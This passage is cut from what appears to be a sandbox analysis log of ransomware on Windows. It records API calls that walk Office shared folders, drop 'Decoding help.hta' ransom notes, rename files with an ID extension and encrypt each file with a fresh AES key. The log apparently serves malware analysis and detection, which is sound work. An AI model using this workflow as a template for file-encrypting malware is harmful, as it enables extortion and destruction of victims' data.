lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll" [0045.309] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0045.309] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\csi.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\csi.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0052.054] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\csi.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x490 [0052.054] CreateFileMappingA (hFile=0x490, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x644 [0052.054] CryptAcquireContextA (in: phProv=0x1521fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1521fcec*=0x3449578) returned 1 [0054.892] CryptGenKey (in: hProv=0x3449578, Algid=0x6610, dwFlags=0x1, phKey=0x1521fce8 | out: phKey=0x1521fce8*=0x5d8890) returned 1 [0054.892] CryptExportKey (in: hKey=0x5d8890, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1521fbe4, pdwDataLen=0x1521fce4 | out: pbData=0x1521fbe4*, pdwDataLen=0x1521fce4*=0x2c) returned 1 [0054.892] MapViewOfFile (hFileMappingObject=0x644, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x6890000 [0054.909] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1521fbe4*, pdwDataLen=0x1521fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1521fbe4*, pdwDataLen=0x1521fcf8*=0x100) returned 1 [0054.909] CryptEncrypt (in: hKey=0x5d8890, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6890000, pdwDataLen=0x1521fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x6890000*, pdwDataLen=0x1521fce4*=0x100000) returned 1 [0055.193] UnmapViewOfFile (lpBaseAddress=0x6890000) returned 1 [0055.889] CloseHandle (hObject=0x644) returned 1 [0055.897] CryptDestroyKey (hKey=0x5d8890) returned 1 [0055.901] CryptReleaseContext (hProv=0x3449578, dwFlags=0x0) returned 1 [0055.901] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.901] WriteFile (in: hFile=0x490, lpBuffer=0x1521fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1521fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1521fbe4*, lpNumberOfBytesWritten=0x1521fcf8*=0x100, lpOverlapped=0x0) returned 1 [0058.893] WriteFile (in: hFile=0x490, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1521fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1521fcf8*=0x500, lpOverlapped=0x0) returned 1 [0058.893] CloseHandle (hObject=0x490) returned 1 [0059.199] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Csi.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.594] FindNextFileW (in: hFindFile=0x671130, lpFindFileData=0x1521fd30 | out: lpFindFileData=0x1521fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadf72d00, ftCreationTime.dwHighDateTime=0x1cb8cce, ftLastAccessTime.dwLowDateTime=0xae376620, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xadf72d00, ftLastWriteTime.dwHighDateTime=0x1cb8cce, nFileSizeHigh=0x0, nFileSizeLow=0x129b80, dwReserved0=0x0, dwReserved1=0x0, cFileName="CsiSoap.dll", cAlternateFileName="")) returned 1 Thread: id = 305 os_tid = 0x640 [0042.464] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\*.*", lpFindFileData=0x1535fd30 | out: lpFindFileData=0x1535fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeefe5e10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xadf4bfa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xadf4bfa0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2ef0 [0045.280] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.280] FindNextFileW (in: hFindFile=0x5e2ef0, lpFindFileData=0x1535fd30 | out: lpFindFileData=0x1535fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeefe5e10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xadf4bfa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xadf4bfa0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.280] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.280] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.280] FindNextFileW (in: hFindFile=0x5e2ef0, lpFindFileData=0x1535fd30 | out: lpFindFileData=0x1535fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeefe5e10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeefe5e10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0045.280] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0045.280] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0045.280] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0045.280] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\*.*" [0045.280] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\*.*") returned 67 [0045.280] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033" [0045.280] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\*.*" [0045.280] GlobalMemoryStatus (in: lpBuffer=0x1535fd10 | out: lpBuffer=0x1535fd10) [0045.280] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x113f4648, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4cc [0045.294] CloseHandle (hObject=0x4cc) returned 1 [0045.294] FindNextFileW (in: hFindFile=0x5e2ef0, lpFindFileData=0x1535fd30 | out: lpFindFileData=0x1535fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bdf7300, ftCreationTime.dwHighDateTime=0x1cb7004, ftLastAccessTime.dwLowDateTime=0xadf4bfa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1bdf7300, ftLastWriteTime.dwHighDateTime=0x1cb7004, nFileSizeHigh=0x0, nFileSizeLow=0x87180, dwReserved0=0x0, dwReserved1=0x0, cFileName="PortalConnectCore.dll", cAlternateFileName="PORTAL~1.DLL")) returned 1 [0045.294] lstrcpyW (in: lpString1=0x9b01290, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\*.*" [0045.294] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\*.*") returned 67 [0045.294] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\Decoding help.hta" [0045.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\decoding help.hta")) returned 0xffffffff [0045.295] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0045.522] WriteFile (in: hFile=0x37c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1535fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1535fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.523] CloseHandle (hObject=0x37c) returned 1 [0045.523] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.717] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PortalConnectCore.dll") returned -1 [0048.717] lstrlenW (lpString="PortalConnectCore.dll") returned 21 [0048.717] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\*.*" [0048.717] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\*.*") returned 67 [0048.717] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\", lpString2="PortalConnectCore.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll" [0048.717] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll" [0048.717] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0048.717] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\portalconnectcore.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\portalconnectcore.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0052.057] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\portalconnectcore.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0052.279] CreateFileMappingA (hFile=0x3a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3b0 [0052.279] CryptAcquireContextA (in: phProv=0x1535fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1535fcec*=0x3449358) returned 1 [0054.944] CryptGenKey (in: hProv=0x3449358, Algid=0x6610, dwFlags=0x1, phKey=0x1535fce8 | out: phKey=0x1535fce8*=0x5d8590) returned 1 [0054.944] CryptExportKey (in: hKey=0x5d8590, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1535fbe4, pdwDataLen=0x1535fce4 | out: pbData=0x1535fbe4*, pdwDataLen=0x1535fce4*=0x2c) returned 1 [0054.944] MapViewOfFile (hFileMappingObject=0x3b0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x87180) returned 0x6f80000 [0054.952] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1535fbe4*, pdwDataLen=0x1535fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1535fbe4*, pdwDataLen=0x1535fcf8*=0x100) returned 1 [0054.952] CryptEncrypt (in: hKey=0x5d8590, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6f80000, pdwDataLen=0x1535fce4*=0x87180, dwBufLen=0x87180 | out: pbData=0x6f80000*, pdwDataLen=0x1535fce4*=0x87180) returned 1 [0055.096] UnmapViewOfFile (lpBaseAddress=0x6f80000) returned 1 [0055.102] CloseHandle (hObject=0x3b0) returned 1 [0055.102] CryptDestroyKey (hKey=0x5d8590) returned 1 [0055.102] CryptReleaseContext (hProv=0x3449358, dwFlags=0x0) returned 1 [0055.102] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.103] WriteFile (in: hFile=0x3a8, lpBuffer=0x1535fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1535fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1535fbe4*, lpNumberOfBytesWritten=0x1535fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.953] WriteFile (in: hFile=0x3a8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1535fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1535fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.953] CloseHandle (hObject=0x3a8) returned 1 [0056.953] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\PortalConnectCore.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.518] FindNextFileW (in: hFindFile=0x5e2ef0, lpFindFileData=0x1535fd30 | out: lpFindFileData=0x1535fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bdf7300, ftCreationTime.dwHighDateTime=0x1cb7004, ftLastAccessTime.dwLowDateTime=0xadf4bfa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1bdf7300, ftLastWriteTime.dwHighDateTime=0x1cb7004, nFileSizeHigh=0x0, nFileSizeLow=0x87180, dwReserved0=0x0, dwReserved1=0x0, cFileName="PortalConnectCore.dll", cAlternateFileName="PORTAL~1.DLL")) returned 0 [0058.518] FindClose (in: hFindFile=0x5e2ef0 | out: hFindFile=0x5e2ef0) returned 1 Thread: id = 306 os_tid = 0x5d0 [0042.466] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*", lpFindFileData=0x1549fd30 | out: lpFindFileData=0x1549fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x8132bc53, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8132bc53, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e31b0 [0045.463] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.463] FindNextFileW (in: hFindFile=0x5e31b0, lpFindFileData=0x1549fd30 | out: lpFindFileData=0x1549fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x8132bc53, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8132bc53, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.658] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.658] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.658] FindNextFileW (in: hFindFile=0x5e31b0, lpFindFileData=0x1549fd30 | out: lpFindFileData=0x1549fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42146c84, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x42146c84, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x41e4d104, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xff, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bears.htm", cAlternateFileName="")) returned 1 [0048.658] lstrcpyW (in: lpString1=0x10fef658, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*" [0048.658] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*") returned 71 [0048.658] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Decoding help.hta" [0048.658] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0xffffffff [0048.659] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0050.382] WriteFile (in: hFile=0x230, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1549fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1549fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.534] CloseHandle (hObject=0x230) returned 1 [0053.665] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.615] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Bears.htm") returned 1 [0057.615] lstrlenW (lpString="Bears.htm") returned 9 [0057.615] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*" [0057.615] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*") returned 71 [0057.615] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\", lpString2="Bears.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.htm") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.htm" [0057.615] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.htm" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.htm") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.htm" [0057.615] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0057.615] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\bears.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\bears.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.615] FindNextFileW (in: hFindFile=0x5e31b0, lpFindFileData=0x1549fd30 | out: lpFindFileData=0x1549fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4216cde4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x4216cde4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x8267651c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bears.jpg", cAlternateFileName="")) returned 1 [0057.615] lstrcpyW (in: lpString1=0x10fef658, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*" [0057.615] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*") returned 71 [0057.615] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Decoding help.hta" [0057.615] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0057.615] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Bears.jpg") returned 1 [0057.616] lstrlenW (lpString="Bears.jpg") returned 9 [0057.616] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*" [0057.616] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\*.*") returned 71 [0057.616] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\", lpString2="Bears.jpg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.jpg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" [0057.616] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.jpg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" [0057.616] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0057.616] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\bears.jpg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Bears.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\bears.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.616] FindNextFileW (in: hFindFile=0x5e31b0, lpFindFileData=0x1549fd30 | out: lpFindFileData=0x1549fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x81305af3, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c36dac1, 